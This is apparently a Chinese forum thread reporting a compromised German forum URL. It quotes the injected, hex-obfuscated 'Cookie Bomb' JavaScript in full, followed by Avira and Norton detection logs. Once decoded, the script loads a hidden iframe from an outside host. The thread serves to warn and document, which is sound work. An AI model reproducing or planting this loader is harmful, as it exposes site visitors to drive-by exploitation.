http://sdl-nrw.de/SDLFORUM/ratethread.php?tid=1

显示全部楼层 · 发表于 2013-11-11 18:41:01

/*0f2490*/
document.write('<img src="http://localhost/" >'); /*/0f2490*/
/*2d3965*/
vtpit = "s" + "p" + "l" + "i" + "t";
ljza = window;
yjrusv = document;
dtvhtz = "0" + "x";
buyad = (5 - 3 - 1);
try {
++(yjrusv.body)
} catch (uzwhb) {
igok = false;
try {} catch (gpnvxc) {
igok = 21;
}
if (1) {
owzbyd = "17:5d:6c:65:5a:6b:60:66:65:17:5d:5c:5d:63:59:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5d:5c:5d:63:59:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:5d:5c:5d:63:59:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:64:60:5a:58:63:64:66:6a:25:5f:66:6a:6b:71:60:25:5a:66:64:26:5c:6a:5b:25:67:5f:67:1e:32:4:1:17:5d:5c:5d:63:59:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:5d:5c:5d:63:59:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2e:1e:32:4:1:17:5d:5c:5d:63:59:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2e:67:6f:1e:32:4:1:17:5d:5c:5d:63:59:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2e:67:6f:1e:32:4:1:17:5d:5c:5d:63:59:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2e:1e:32:4:1:17:5d:5c:5d:63:59:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2e:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:5d:5c:5d:63:59:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:5d:5c:5d:63:59:53:1e:17:5a:63:58:6a:6a:34:53:1e:5d:5c:5d:63:59:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:5d:5c:5d:63:59:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:5d:5c:5d:63:59:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5d:5c:5d:63:59:27:30:1f:20:32:4:1:74:4:1:74" [vtpit](":");
}
ljza = owzbyd;
elkdyp = [];
for (napbm = 22 - 20 - 2; - napbm + 1413 != 0; napbm += 1) {
sap = napbm;
if ((0x19 == 031)) elkdyp += String.fromCharCode(eval(dtvhtz + ljza[1 * sap]) + 0xa - buyad);
}
qlyvd = eval;
qlyvd(elkdyp)
} /*/2d3965*/

复制代码

Avira

2013/11/11 下午 06:37 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\7853OJ09\popup_menu[1].js'
   包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
   已採取動作：
   檔案會移動至 '4c7631c7.qua' 名稱底下的隔離區目錄。.

2013/11/11 下午 06:37 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\7853OJ09\prototype[1].js'
   包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
   已採取動作：
   檔案會移動至 '54fe1e5d.qua' 名稱底下的隔離區目錄。.

2013/11/11 下午 06:37 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 792
   目錄數： 0
   惡意程式碼數： 3
   警告數： 0

2013/11/11 下午 06:37 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\7853OJ09\general[1].js'
   包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
   已採取動作：
   檔案會移動至 '1e376b25.qua' 名稱底下的隔離區目錄。.

2013/11/11 下午 06:36 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\7853OJ09\popup_menu[1].js 中
   偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
   執行的動作：傳輸至掃描程式

2013/11/11 下午 06:36 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\7853OJ09\general[1].js 中
   偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
   執行的動作：傳輸至掃描程式

2013/11/11 下午 06:36 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\7853OJ09\prototype[1].js 中
   偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
   執行的動作：傳輸至掃描程式

2013/11/11 下午 06:36 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\7853OJ09\prototype[1].js 中
   偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
   執行的動作：拒絕存取

2013/11/11 下午 06:36 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\7853OJ09\general[1].js 中
   偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
   執行的動作：拒絕存取

2013/11/11 下午 06:36 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\7853OJ09\popup_menu[1].js 中
   偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
   執行的動作：拒絕存取

2013/11/11 下午 06:36 [Web Protection] 已停用 Web Protection
   服務已停用

2013/11/11 下午 06:36 [Web Protection] 封鎖的網頁
   URL (http://sdl-nrw.de/SDLFORUM/ratethread.php?tid=1) 的評估結果為惡意程式碼，而遭到封鎖。

fs is

显示全部楼层 · 发表于 2013-11-12 19:06:17

本帖最后由 xwems 于 2013-11-12 19:11 编辑

类别：入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2013/11/12 19:03:41,高,阻止了 sdl-nrw.de 的入侵企图,已阻止,不需要操作,Web Attack: Cookie Bomb Injection Website,不需要操作,不需要操作,"sdl-nrw.de (82.165.91.91, 80)", .sdl-nrw.de/wwwSDLFORUM/jscripts/general.js?ver=1603,"LD-PC (192.168.1.2, )",82.165.91.91 (82.165.91.91),"TCP, www-http"
来自 www.sdl-nrw.de/SDLFORUM/jscripts/general.js?ver=1603 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME2\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE 引起。要停止接收有关此类通信的通知，请在“操作”面板中单击“不再提醒我”。

诺顿特警拦截。

[已鉴定] http://sdl-nrw.de/SDLFORUM/ratethread.php?tid=1